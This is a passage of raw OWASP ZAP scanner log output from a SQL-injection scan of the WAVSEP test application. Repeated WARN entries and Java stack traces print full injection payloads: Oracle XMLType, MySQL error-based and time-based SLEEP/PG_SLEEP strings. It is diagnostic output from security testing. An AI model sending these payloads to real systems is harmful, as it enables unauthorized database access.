org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679645 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 1411=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1411=1411) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 1411=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1411=1411) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679645 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 8266=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8266=8266) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- ayBq] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 8266=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8266=8266) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- ayBq at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679646 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 5980 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5980=5980,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT 5980 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5980=5980,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679647 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(7020=7020,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(7020=7020,1))),0x3a7561713a)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679648 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5890=5890) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5890=5890) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679649 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4552=4552) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4552=4552) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679650 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini);(SELECT * FROM (SELECT(SLEEP(5)))gkIR)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);(SELECT * FROM (SELECT(SLEEP(5)))gkIR)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679650 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;(SELECT * FROM (SELECT(SLEEP(5)))mhzC)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))mhzC)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679651 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini');(SELECT * FROM (SELECT(SLEEP(5)))WLUA)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');(SELECT * FROM (SELECT(SLEEP(5)))WLUA)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679652 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini';(SELECT * FROM (SELECT(SLEEP(5)))HoVV)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';(SELECT * FROM (SELECT(SLEEP(5)))HoVV)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679653 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%';(SELECT * FROM (SELECT(SLEEP(5)))QaKa)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';(SELECT * FROM (SELECT(SLEEP(5)))QaKa)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679654 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;(SELECT * FROM (SELECT(SLEEP(5)))IfqD)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))IfqD)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679654 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini);SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679655 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 